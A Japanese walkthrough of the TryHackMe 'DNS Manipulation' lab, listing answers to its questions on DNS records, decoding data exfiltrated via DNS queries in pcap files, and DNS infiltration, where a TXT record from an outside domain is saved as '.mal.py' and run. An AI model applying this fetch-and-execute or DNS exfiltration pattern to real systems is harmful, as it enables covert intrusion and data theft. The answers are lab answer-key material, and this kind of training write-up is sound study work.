概要
TryHackMe「DNS Manipulation」のWalkthroughです。
Task4
Q1.If you were on Windows, what command could you use to query a txt record for 'youtube.com'?
nslookupの-typeでレコードタイプを指定できます。
A.nslookup -type=txt youtube.com
Q2.If you were on Linux, what command could you use to query a txt record for 'facebook.com'?
A.dig facebook.com txt
Q3.AAAA stores what type of IP Address along with the hostname?
A.IPv6
Q4.Maximum characters for a DNS TXT Record is 256. (Yay/Nay)
最大サイズは255文字に制限されています。
A.Nay
Q5.What DNS Record provides a domain name in reverse-lookup? (Research)
A.PTR
Q6.What would the reverse-lookup be for the following IPv4 Address? (192.168.203.2) (Research)
$ dig -x 192.168.203.2
; <<>> DiG 9.19.19-1-Debian <<>> -x 192.168.203.2
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 42382
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;2.203.168.192.in-addr.arpa. IN PTR
;; Query time: 4 msec
;; SERVER: 192.168.11.1#53(192.168.11.1) (UDP)
;; WHEN: Thu Jan 23 09:48:55 EST 2025
;; MSG SIZE rcvd: 55
A.2.203.168.192.in-addr.arpa.
Task5
Q1.What is the maximum length of a DNS name? (Research) (Length includes dots!)
253文字に設定されています。
A.253
Task7
Q1.What is the Transaction name? (Type it as you see it)
ターゲットマシンにSSH接続します。
$ ssh user@10.10.110.36
user@user1:~$
タスクファイルを確認します。
user@user1:~/dns-exfil-infil$ cat ../challenges/exfiltration/orderlist/TASK
The order.pcap file has suspecious queries. Use the ~/dns-exfil-infil/packetyGrabber.py to decode
the data and answer the questions accrodingly.
IDENTIFY THE DOMAIN NAME USED TO EXFILTRATE DATA
use the following command to see all DNS Queries
tshark -r order.pcap -T fields -e dns.qry.name
(ignore the .localdomain part)
Use the packetyGrabber.py located in ~/dns-exfil-infil/ folder to decode the DNS queries to a plain-text file.
python3 ~/dns-exfil-infil/packetyGrabber.py
IGNORE THE EXCEPTION THROWN AT THE END OF SCRIPT
tsharkを使用してpcapファイルからDNSパケットを確認するとドメイン名がbadbaddoma.inだと分かりました。
user@user1:~/challenges/exfiltration/orderlist$ tshark -r order.pcap -T fields -e dns.qry.name
8.8.8.8.in-addr.arpa
g3KvmYb7QTUtBwLWHzLVvci.badbaddoma.in.localdomain
g3KvmYb7QTUtBwLWHzLVvci.badbaddoma.in.localdomain
g3KvmYb7QTUtBwLWHzLVvci.badbaddoma.in.localdomain
g3KvmYb7QTUtBwLWHzLVvci.badbaddoma.in.localdomain
(省略)
packetyGrabber.pyを実行します。
user@user1:~/challenges/exfiltration/orderlist$ python3 ~/dns-exfil-infil/packetyGrabber.py
File captured: /home/user/challenges/exfiltration/orderlist/order.pcap
Filename output: order.txt
Domain Name (Example: badbaddoma.in): badbaddoma.in
[+] Domain Name set to badbaddoma.in
[+] Filtering for your domain name.
[+] Base58 decoded.
[+] Base64 decoded.
[+] Output to order.txt
output fileを確認します。
user@user1:~/challenges/exfiltration/orderlist$ cat order.txt
DATE ORDER-ID TRANSACTION PRICE CODE
01-06 1 Network Equip. $2349.99 -
01-09 2 Software Licen. $1293.49 -
01-11 3 Physical Secur. $7432.79 -
02-06 4 SENT TO #1056.. $15040.23 -
02-06 5 1M THM VOUCHER $10 zSiSeC
02-06 6 Firewall $2500 -
A.Network Equip.
Q2.How much was the Firewall? (Without the $)
A.2500
Q3.Which file contains suspicious DNS queries?
challenges/exfiltration/identify/TASKファイルを確認します。
user@user1:~/challenges/exfiltration/orderlist$ cat ../identify/TASK
Steps on how to solve this task:
1. Identify which file contains the suspicious dns queries.
2. Identify what domain name was used to exfiltrate the data.
( You can use tshark to filter the dns query name )
( Google how to filter dns query names with tshark )
3. Run ~/dns-exfil-infil/packetyGrabber.py and put the correct inputs in.
If you do everything correctly you will be able to answer the last 2 questions.
cap3.pcapファイルから怪しいドメインを確認できます。
$ tshark -r cap3.pcap -T fields -e dns.qry.name
g5SUFQJi3BgPBgh2jYe5Vhm.badbaddoma.in
g5SUFQJi3BgPBgh2jYe5Vhm.badbaddoma.in
A.cap3.pcap
Q4.Enter the plain-text after you have decoded the data using packetyGrabber.py found in ~/dns-exfil-infil/ folder.
packetyGrabber.pyを実行します。
user@user1:~/challenges/exfiltration/identify$ python3 ~/dns-exfil-infil/packetyGrabber.py
File captured: /home/user/challenges/exfiltration/identify/cap3.pcap
Filename output: cap3.txt
Domain Name (Example: badbaddoma.in): badbaddoma.in
[+] Domain Name set to badbaddoma.in
[+] Filtering for your domain name.
[+] Base58 decoded.
[+] Base64 decoded.
[+] Output to cap3.txt
出力されたファイルから認証情報を取得できました。
$ cat cap3.txt
administrator:s3cre7P@ssword
A.administrator:s3cre7P@ssword
Task8
Q1.What type of DNS Record is usually used to infiltrate data into a network?
A.TXT
Task10
Q1.Enter the output from the executed python file
TASKファイルを確認します。
user@user1:~/challenges/infiltration$ cat TASK
For this TASK we will be requesting a TXT Record from my public domain name.
Here is the information needed to complete this challenge:
My Domain Name: badbaddoma.in
Request TXT Record from this subdomain: code
Save the text value to a python file
Run the ~/dns-exfil-infil/packetySimple.py to decode the text
Run the program: python3 [your-file-name].py
Take a note of the output and answer the question in the "DNS Infiltration - Practice" section.
code.nodrc.comのTXTレコードを調べます。
user@user1:~/challenges/infiltration$ nslookup -type=TXT code.nodrc.com
Server: 10.0.0.2
Address: 10.0.0.2#53
Non-authoritative answer:
code.nodrc.com text = "YeeTbunLbACdXq193g6VHXRuDQ9Y1upaAzA3UkpCr8yBBE68JEXU32wxNE44"
TXTレコードの値だけを取り出します。
user@user1:~/challenges/infiltration$ nslookup -type=TXT code.nodrc.com | grep Yee | cut -d \" -f2
YeeTbunLbACdXq193g6VHXRuDQ9Y1upaAzA3UkpCr8yBBE68JEXU32wxNE44
それを.mal.pyとして保存します。
$ nslookup -type=TXT code.nodrc.com | grep Yee | cut -d \" -f2 > .mal.py
packetySimple.pyを実行し、.mal.pyを指定します。
$ python3 ~/dns-exfil-infil/packetySimple.py
Filename: .mal.py
[+] Reading from file...
[+] Base58 decoded.
[+] Base64 decoded.
[+] Done, .mal.py is decoded.
.mal.pyを実行します。
$ python3 .mal.py
4.4.0-186-generic
A.4.4.0-186-generic
Task11
Q1.What program was used to Tunnel HTTP over DNS?
A.iodine